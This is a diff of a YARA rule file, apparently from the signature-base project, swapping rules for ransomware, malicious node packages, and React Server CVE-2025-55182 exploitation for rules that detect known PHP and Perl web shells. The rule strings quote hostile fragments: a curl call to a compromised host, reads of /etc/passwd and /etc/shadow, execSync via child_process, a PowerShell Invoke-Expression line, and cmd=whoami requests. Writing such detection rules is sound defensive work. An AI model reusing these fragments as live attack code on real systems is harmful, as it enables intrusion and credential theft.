-		$code_custom_algorithm = { 89 c1 45 31 e6 31 e8 44 31 f0 35 ?? ?? ?? ?? c1 c0 0b 44 31 ff 44 31 ef 31 c7 81 f7 ?? ?? ?? ?? c1 c7 0b 44 31 e3 31 cb 31 fb 81 f3 ?? ?? ?? ?? c1 c3 0b 89 da 31 c2 89 84 24 ?? ?? ?? ?? 44 31 ed 31 d5 89 94 24 ?? ?? ?? ?? 81 f5 ?? ?? ?? ?? c1 c5 0b 41 89 e8 41 31 f8 89 bc 24 ?? ?? ?? ?? 41 31 cf 45 31 c7 44 89 84 24 ?? ?? ?? ?? 41 81 f7 ?? ?? ?? ?? 41 c1 c7 0b 41 31 d4 45 31 fc 41 81 f4 ?? ?? ?? ?? 41 c1 c4 0b 45 31 c5 45 31 e5 41 81 f5 ?? ?? ?? ?? 41 c1 c5 0b 89 9c 24 ?? ?? ?? ?? 31 d9 44 31 f9 44 31 e9 81 f1 ?? ?? ?? ?? c1 c1 0b 41 89 c8 45 31 e0 44 89 a4 24 ?? ?? ?? ?? 89 ac 24 ?? ?? ?? ?? 31 e8 44 31 c0 35 ?? ?? ?? ?? c1 c0 0b 44 89 fa 44 89 bc 24 ?? ?? ?? ?? 31 fa 44 31 ea 31 c2 41 89 c1 81 f2 ?? ?? ?? ?? c1 c2 0b 41 31 d8 41 31 d0 41 81 f0 ?? ?? ?? ?? 41 c1 c0 0b 44 89 e8 44 89 ac 24 ?? ?? ?? ?? 31 e8 44 31 c8 44 31 c0 45 89 c3 35 }
-		$megazord_str_I = "powerranges" ascii
-		$megazord_str_II = "onion" ascii
-		$megazord_str_III = "powershell" ascii
-		$megazord_str_IV = "taskkill" ascii
-		$megazord_str_V = "mal_public_key_bytes" ascii
-		$megazord_str_VI = "runneradmin" ascii
-		$megazord_str_VII = "//rustc" ascii
+		$s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
+		$s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $code_custom_algorithm and 5 of ( $megazord_str_* )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Etoroloro_Malicious_Nodepackage_Dec25 : FILE
+rule SIGNATURE_BASE_Phpbackdoor15_Php
 {
 	meta:
-		description = "Detects malicious component of node package named Etoroloro"
-		author = "Pezier Pierre-Henri"
-		id = "e4d05de8-2452-5c92-826e-0a2131d98ce6"
-		date = "2025-12-12"
-		modified = "2025-12-15"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_etoroloro_nodepackage_dec25.yar#L2-L26"
+		description = "Semi-Auto-generated  - file phpbackdoor15.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "a93b881b-3050-5f43-803c-4a571aaaef82"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4707-L4719"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f08c5b748c91dd45fd73c5e85920f656e361d94b869e2147410b2b528c6ae78f"
-		logic_hash = "bd890359c38fb7f2af31390666691af70a202dcf352ef44e95493dc340c07e94"
-		score = 80
+		hash = "0fdb401a49fc2e481e3dfd697078334b"
+		logic_hash = "cdd105f36593e8326ca32bf7cf1fba6fb754e7305c91fe6c078323db8f59b23c"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "DLLSideload."
-		$s2 = "Failed to expand path:" wide
-		$op1 = {
-         41 0f af c0           // imul    eax, r8d
-         48 8d 52 01           // lea     rdx, [rdx+1]
-         0f b6 c9              // movzx   ecx, cl
-         45 69 c0 35 d4 04 00  // imul    r8d, 4D435h
-         03 c1                 // add     eax, ecx
-         0f b6 0a              // movzx   ecx, byte ptr [rdx]
-         84 c9                 // test    cl, cl
-         75 e5                 // jnz     short loc_1800022C0
-      }
+		$s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
+		$s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
+		$s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or $op1 )
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Github_Repo_Compromise_Myjino_Ru_Aug22
+rule SIGNATURE_BASE_Phpjackal_Php
 {
 	meta:
-		description = "Detects URL mentioned in report on compromised Github repositories in August 2022"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1eaabad5-d0de-5d17-a5fa-3c638354843d"
-		date = "2022-08-03"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/stephenlacy/status/1554697077430505473"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_repo_compromise_myjino_ru.yar#L2-L15"
+		description = "Semi-Auto-generated  - file phpjackal.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ae46cb97-1ff8-50ba-856f-c38fbb1e5163"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4720-L4731"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5cbe6ee46a68d89b1e772762e29baa907458235cd014f20a0d0932e95c046f19"
-		score = 90
+		hash = "ab230817bcc99acb9bdc0ec6d264d76f"
+		logic_hash = "6e2ff262aecd08e5feaa274a7fd128d75565d6cc03341da7cbeb2949070705e5"
+		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$x1 = "curl http://ovz1.j19544519.pr46m.vps.myjino.ru" ascii wide
-		$x2 = "http__.Post(\"http://ovz1.j19544519.pr46m.vps.myjino.ru" ascii wide
+		$s3 = "$dl=$_REQUEST['downloaD'];"
+		$s4 = "else shelL(\"perl.exe $name $port\");"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_MAL_Backnet_Nov18_1 : FILE
+rule SIGNATURE_BASE_Sql_Php_Php : FILE
 {
 	meta:
-		description = "Detects BackNet samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f8575c5a-710d-5e97-91c1-5db454c6baf4"
-		date = "2018-11-02"
-		modified = "2023-12-05"
-		reference = "https://github.com/valsov/BackNet"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_mal_backnet.yar#L2-L20"
+		description = "Semi-Auto-generated  - file sql.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4732-L4745"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ea809a65a3cd786efe03ff7d831847e658851f76ee9dd084cb6c622b6e44c75f"
+		hash = "8334249cbb969f2d33d678fec2b680c5"
+		logic_hash = "016ea01e9b53add0799f5c105fb3d54e6ee07d01c950772a618b2a780f14254f"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "4ce82644eaa1a00cdb6e2f363743553f2e4bd1eddb8bc84e45eda7c0699d9adc"
 
 	strings:
-		$s1 = "ProcessedByFody" fullword ascii
-		$s2 = "SELECT * FROM AntivirusProduct" fullword wide
-		$s3 = "/C netsh wlan show profile" wide
-		$s4 = "browsertornado" fullword wide
-		$s5 = "Current user is administrator" fullword wide
-		$s6 = "/C choice /C Y /N /D Y /T 4 & Del" wide
-		$s7 = "ThisIsMyMutex-2JUY34DE8E23D7" wide
+		$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"
+		$s2 = "http://rst.void.ru"
+		$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them
+		1 of them and not uint32( 0 ) == 0x6D783F3C
 }
-rule SIGNATURE_BASE_Darkeyev3_Cryptor : FILE
+rule SIGNATURE_BASE_Cgi_Python_Py
 {
 	meta:
-		description = "Rule to detect DarkEYEv3 encrypted executables (often malware)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "a2b455e5-3021-5662-b593-c1aeeb34c226"
-		date = "2015-05-24"
-		modified = "2023-12-05"
-		reference = "http://darkeyev3.blogspot.fi/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/generic_cryptors.yar#L2-L24"
+		description = "Semi-Auto-generated  - file cgi-python.py.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "75e99d10-3cdf-5f87-9933-4ce5ebe18b09"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4746-L4758"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fdd3a9c22aebb40d000a642f2433adc7dd591784bdf2924edc3effce7bbfa5c2"
-		score = 55
+		hash = "0a15f473e2232b89dae1075e1afdac97"
+		logic_hash = "37c6c7db32a52c8a83ff85f0a50c6fa71e833b9e6d20b1f95e9512fe8bbd0aee"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash0 = "6b854b967397f7de0da2326bdd5d39e710e2bb12"
-		hash1 = "d53149968eca654fc0e803f925e7526fdac2786c"
-		hash2 = "7e3a8940d446c57504d6a7edb6445681cca31c65"
-		hash3 = "d3dd665dd77b02d7024ac16eb0949f4f598299e7"
-		hash4 = "a907a7b74a096f024efe57953c85464e87275ba3"
-		hash5 = "b1c422155f76f992048377ee50c79fe164b22293"
-		hash6 = "29f5322ce5e9147f09e0a86cc23a7c8dc88721b9"
-		hash7 = "a0382d7c12895489cb37efef74c5f666ea750b05"
-		hash8 = "f3d5b71b7aeeb6cc917d5bb67e2165cf8a2fbe61"
+		tags = ""
 
 	strings:
-		$s0 = "\\DarkEYEV3-"
+		$s0 = "a CGI by Fuzzyman"
+		$s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "
+		$s2 = "values = map(lambda x: x.value, theform[field])     # allows for"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $s0
+		1 of them
 }
-rule SIGNATURE_BASE_Groups_Cpassword : FILE
+rule SIGNATURE_BASE_Ru24_Post_Sh_Php_Php
 {
 	meta:
-		description = "Groups XML contains cpassword value, which is decrypted password - key is in MSDN http://goo.gl/mHrC8P"
-		author = "Florian Roth (Nextron Systems)"
-		id = "37036df9-871f-5ecd-acac-6a064d298115"
-		date = "2015-09-08"
-		modified = "2023-12-05"
-		reference = "http://www.grouppolicy.biz/2013/11/why-passwords-in-group-policy-preference-are-very-bad/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_gpp_cpassword.yar#L2-L20"
+		description = "Semi-Auto-generated  - file ru24_post_sh.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "78669d3e-629b-591a-a766-923e37d1fdba"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4759-L4771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "de37dc77d9a2462f5d54ad5225405c6d95dad39e67a893f5442b26dc641a20f9"
-		score = 50
-		quality = 60
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash = "5b334d494564393f419af745dc1eeec7"
+		logic_hash = "e81e5345bbe07ca85c94a3d8411f0dd3c418689ccae7115c098f718f9093b3bf"
+		score = 75
+		quality = 85
+		tags = ""
 
 	strings:
-		$s1 = / cpassword=\"[^\"]/ ascii
-		$s2 = " changeLogon=" ascii
-		$s3 = " description=" ascii
-		$s4 = " acctDisabled=" ascii
+		$s1 = "<title>Ru24PostWebShell - \".$_POST['cmd'].\"</title>" fullword
+		$s3 = "if ((!$_POST['cmd']) || ($_POST['cmd']==\"\")) { $_POST['cmd']=\"id;pwd;uname -a"
+		$s4 = "Writed by DreAmeRz" fullword
 
 	condition:
-		uint32be( 0 ) == 0x3C3F786D and filesize < 1000KB and all of ( $s* )
+		1 of them
 }
-rule SIGNATURE_BASE_APT_PS1_Sysaid_EXPL_Forensicartifacts_Nov23_1 : SCRIPT CVE_2023_47246
+rule SIGNATURE_BASE_Dtool_Pro_Php
 {
 	meta:
-		description = "Detects forensic artifacts found in attacks on SysAid on-prem software exploiting CVE-2023-47246"
-		author = "Florian Roth"
-		id = "df7997d3-9309-58b3-8cd7-de9fea36d3c7"
-		date = "2023-11-09"
-		modified = "2023-12-05"
-		reference = "https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sysaid_cve_2023_47246.yar#L2-L15"
+		description = "Semi-Auto-generated  - file DTool Pro.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "c02c522c-8418-5760-869a-52b41785bebc"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4772-L4784"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "85efeea88961ca99b22004726d88efc46c748273b9a0b3be674f4cbb12cd3dd1"
-		score = 85
+		hash = "366ad973a3f327dfbfb915b0faaea5a6"
+		logic_hash = "e8f8b4ca2ab4607e700e897671fd230280763a70897b8ccfc31b3bcb7f2a1f4a"
+		score = 75
 		quality = 85
-		tags = "SCRIPT, CVE-2023-47246"
+		tags = ""
 
 	strings:
-		$x1 = "if ($s -match '^(Sophos).*\\.exe\\s') {echo $s; $bp++;}" ascii wide
-		$x2 = "$s=$env:SehCore;$env:SehCore=\"\";Invoke-Expression $s;" ascii wide
+		$s0 = "r3v3ng4ns\\nDigite"
+		$s1 = "if(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: It seems that the permissi"
+		$s3 = "if (empty($cmd) and $ch_msg==\"\") echo (\"Comandos Exclusivos do DTool Pro\\n"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_MAL_Loader_Turtleloader_Nov23 : CVE_2023_47246 FILE
+rule SIGNATURE_BASE_Telnetd_Pl
 {
 	meta:
-		description = "Detects Tutle loader used in attacks against SysAid CVE-2023-47246"
-		author = "Florian Roth"
-		id = "c7b5d03d-52c4-59b4-ac69-55e532a21340"
-		date = "2023-11-09"
-		modified = "2023-12-05"
-		reference = "https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sysaid_cve_2023_47246.yar#L17-L38"
+		description = "Semi-Auto-generated  - file telnetd.pl.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "05b5d247-3133-5902-a2ee-b84fa89c7f32"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4785-L4799"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "14a1636ed4dc3c897fefe53946e67339f91da9e2fbed2c99b9b4119dcc2649c0"
-		score = 85
+		hash = "5f61136afd17eb025109304bd8d6d414"
+		logic_hash = "faf21758b311fa4c2d11cd60169e6c9a67282cf739b73664456691361a480419"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-47246, FILE"
-		hash1 = "b5acf14cdac40be590318dee95425d0746e85b1b7b1cbd14da66f21f2522bf4d"
+		tags = ""
 
 	strings:
-		$s1 = "No key in args!" ascii fullword
-		$s2 = "Bad data file!" ascii fullword
-		$s3 = "Data file loaded. Running..." ascii
-		$op1 = { 48 8d 55 c8 4c 8d 3d ac 8f 00 00 45 33 c9 45 33 d2 4d 8b e7 44 21 0a 45 33 db 4c 8d 3d 16 ec ff ff }
-		$op2 = { 48 d3 e8 0f b6 c8 49 03 cb 49 81 c3 00 01 00 00 45 33 8c 8f a0 e4 00 00 41 83 fa 04 7c c7 41 ff c0 }
-		$op3 = { 48 83 c1 04 48 ff ca 89 41 1c 75 ef 03 f6 48 83 c3 20 48 ff cd 0f 85 77 ff ff ff }
+		$s0 = "0ldW0lf" fullword
+		$s1 = "However you are lucky :P"
+		$s2 = "I'm FuCKeD"
+		$s3 = "ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);#"
+		$s4 = "atrix@irc.brasnet.org"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and 3 of them
+		1 of them
 }
-rule SIGNATURE_BASE_MAL_Grace_Dec22
+rule SIGNATURE_BASE_Php_Include_W_Shell_Php
 {
 	meta:
-		description = "Detects Grace (aka FlawedGrace and GraceWire) RAT"
-		author = "X__Junior"
-		id = "fc2214dc-f1e5-52d7-a9de-88709a03b04e"
-		date = "2022-12-13"
-		modified = "2023-12-05"
-		reference = "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_sysaid_cve_2023_47246.yar#L40-L59"
+		description = "Semi-Auto-generated  - file php-include-w-shell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "ddcf9031-2ec8-5a86-8326-60e4a699f494"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4800-L4811"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8276662dadfa2f8e07dd7882a60e55bd22ecf1f8f66a09940f16236598646560"
-		score = 70
+		hash = "4e913f159e33867be729631a7ca46850"
+		logic_hash = "a63910d97b7ef447b2cadb7de12943d3dbb6eada27d3097b8acf58d9b65b6f60"
+		score = 75
 		quality = 85
 		tags = ""
-		hash1 = "a66df3454b8c13f1b92d8b2cf74f5bfcdedfbff41a5e4add62e15277d14dd169"
-		hash2 = "e113a8df3c4845365f924bacf10c00bcc5e17587a204b640852dafca6db20404"
 
 	strings:
-		$sa1 = "Grace finalized, no more library calls allowed." ascii
-		$sa2 = "Socket forcibly closed due to no response to DISCONNECT signal from other side, worker id(%d)" ascii
-		$sa3 = "AVWireCleanupThread" ascii
-		$sa4 = "AVTunnelClientDirectIO" ascii
-		$sa5 = "AVGraceTunnelWriteThread" ascii
-		$sa6 = "AVGraceTunnelClientDirectIO" ascii
+		$s0 = "$dataout .= \"<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incd"
+		$s1 = "if($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $strOutput .= DB"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_EXPL_React_Server_CVE_2025_55182_POC_Dec25 : CVE_2025_55182
+rule SIGNATURE_BASE_Safe0Ver_Shell__Safe_Mod_Bypass_By_Evilc0Der_Php
 {
 	meta:
-		description = "Detects in-memory webshell indicators related to the proof-of-concept code for the React Server Remote Code Execution Vulnerability (CVE-2025-55182)"
-		author = "Florian Roth"
-		id = "6ce94e2d-64bf-5b1c-8f9a-1a22470cad76"
-		date = "2025-12-05"
-		modified = "2025-12-12"
-		reference = "https://x.com/pyn3rd/status/1996840827897954542/photo/1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L1-L19"
+		description = "Semi-Auto-generated  - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "25971f62-33ee-5ed6-8d72-118be5bd2deb"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4812-L4824"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a4f27fc85807e8f94e6947523a09d87ceed0658334756a9724322181c3eecd20"
-		score = 70
+		hash = "6163b30600f1e80d2bb5afaa753490b6"
+		logic_hash = "46f6bb38f1175e02b03047c06a7aed968b1c1ce2e28cc4b88e15703040e91592"
+		score = 75
 		quality = 85
-		tags = "CVE-2025-55182"
+		tags = ""
 
 	strings:
-		$xs1 = "{const cmd=p.query.cmd;if(!cmd)(s.writeHead(400);"
-		$s1 = ";if(p.pathname=="
-		$s2 = ".writeHead(400);"
-		$s3 = ".writeHead(200,{'Content-Type':"
-		$s4 = ".execSync("
-		$s5 = ",stdio:'pipe'})"
+		$s0 = "Safe0ver" fullword
+		$s1 = "Script Gecisi Tamamlayamadi!"
+		$s2 = "document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%"
 
 	condition:
-		1 of ( $x* ) or all of ( $s* )
+		1 of them
 }
-rule SIGNATURE_BASE_SUSP_WEBSHELL_LOG_Signatures_Dec25 : FILE
+rule SIGNATURE_BASE_Shell_Php_Php
 {
 	meta:
-		description = "Detects indicators related simple webshells that use the same exec/cmd pattern"
-		author = "Florian Roth"
-		id = "ac589f51-dfec-5bac-a402-0f304bcb9422"
-		date = "2025-12-05"
-		modified = "2025-12-12"
-		reference = "https://x.com/pyn3rd/status/1996840827897954542/photo/1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L21-L37"
+		description = "Semi-Auto-generated  - file shell.php.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "eaf243cb-fa26-5f34-a724-60a08acff636"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4825-L4837"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d9bc32a48e37708928a658d171f6cac7c363b346d201e7aed17c8cbe48bab115"
-		score = 60
+		hash = "1a95f0163b6dea771da1694de13a3d8d"
+		logic_hash = "dbd08e71dc512f8dcf009150fb4448cd3608291ef9078c7e6b86e6f8d820bd94"
+		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$xa1 = "/exec?cmd=ls"
-		$xa2 = "/exec?cmd=whoami"
-		$xa3 = "/exec?cmd=id"
-		$xa4 = "/exec?cmd=uname%20-a"
+		$s1 = "/* We have found the parent dir. We must be carefull if the parent " fullword
+		$s2 = "$tmpfile = tempnam('/tmp', 'phpshell');"
+		$s3 = "if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {" fullword
 
 	condition:
-		1 of them and not uint16( 0 ) == 0x3c3f
+		1 of them
 }
-rule SIGNATURE_BASE_EXPL_RCE_React_Server_CVE_2025_55182_POC_Dec25 : CVE_2025_55182 FILE
+rule SIGNATURE_BASE_Telnet_Cgi
 {
 	meta:
-		description = "Detects RCE indicators related to the proof-of-concept code for the React Server Remote Code Execution Vulnerability (CVE-2025-55182)"
-		author = "Florian Roth"
-		id = "4e876c1c-41cc-57aa-9fe2-652f3a1e3ef2"
-		date = "2025-12-05"
-		modified = "2025-12-12"
-		reference = "https://www.youtube.com/watch?v=MmdwakT-Ve8"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L39-L53"
+		description = "Semi-Auto-generated  - file telnet.cgi.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "4ca3dace-cd80-58e4-a4de-47dcc64dac0e"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4838-L4850"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "54854f6cf3d1f4f30fb6de8312a5969bd5bc0d8c7a047a9f0ef195551c1dc2c6"
-		score = 70
+		hash = "dee697481383052980c20c48de1598d1"
+		logic_hash = "689c1d43c64aa7469989686c60fc9ab46acde42fdf3c1157bae1e2b8373c845f"
+		score = 75
 		quality = 85
-		tags = "CVE-2025-55182, FILE"
+		tags = ""
 
 	strings:
-		$s1 = "process.mainModule.require('child_process').execSync("
-		$s2 = "$1:constructor:constructor"
+		$s1 = "W A R N I N G: Private Server"
+		$s2 = "print \"Set-Cookie: SAVEDPWD=;\\n\"; # remove password cookie"
+		$s3 = "$Prompt = $WinNT ? \"$CurrentDir> \" : \"[admin\\@$ServerName $C"
 
 	condition:
-		all of them and not uint16( 0 ) == 0x3c3f
+		1 of them
 }
-rule SIGNATURE_BASE_EXPL_RCE_React_Server_Next_JS_CVE_2025_66478_Tracebacks_Dec25 : CVE_2025_55182 CVE_2025_66478
+rule SIGNATURE_BASE_Ironshell_Php
 {
 	meta:
-		description = "Detects traceback indicators caused by the exploitation of the React Server Remote Code Execution Vulnerability (CVE-2025-55182) in Next.js applications (CVE-2025-66478). This can also be caused by vulnerability scanning."
-		author = "Florian Roth"
-		id = "b13f1f50-9ac9-5fe0-95d1-f075ac90cb62"
-		date = "2025-12-05"
-		modified = "2025-12-12"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/react_pocs_indicators_dec25.yar#L55-L68"
+		description = "Semi-Auto-generated  - file ironshell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "0d63ad03-4d1d-535f-8afe-3edaf1bf4010"
+		date = "2016-02-15"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L4851-L4865"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "668316531c7c87248acdd450e6ced2247ed0252f395754cb2d7370f748c30944"
-		score = 55
+		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+		logic_hash = "23574299ee2bb33c3f71102adf71ac8f09b6f8ece5f798beacb9b2432d297ee7"
+		score = 75
 		quality = 85
-		tags = "CVE-2025-55182, CVE-2025-66478"
+		tags = ""
 
 	strings:
-		$s1 = "Unexpected end of form"
-		$s2 = "/next-server/app-page.runtime.dev.js:2:457"
-		$s3 = "/app-page.runtime.dev.js:2:472"
+		$s0 = "www.ironwarez.info"
+		$s1 = "$cookiename = \"wieeeee\";"
+		$s2 = "~ Shell I"
+		$s3 = "www.rootshell-team.info"
+		$s4 = "setcookie($cookiename, $_POST['pass'], time()+3600);"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_EXPL_RCE_React_Server_Next_JS_CVE_2025_66478_Errors_Dec25 : CVE_2025_55182 CVE_2025_66478
+rule SIGNATURE_BASE_Backdoorfr_Php
 {
 	meta:
-		description = "Detects error messages caused by the exploitation of the React Server Remote Code Execution Vulnerability (CVE-2025-55182) in Next.js applications (CVE-2025-66478). This can also be caused by vulnerability scanning."
-		author = "Florian Roth"
-		id = "6f0e572d-8598-51e0-8197-09a6ea930b81"
-		date = "2025-12-05"
-		modified = "2025-12-12"
-		reference = "https://github.com/Malayke/Next.js-RSC-RCE-Scanner-CVE-2025-66478"
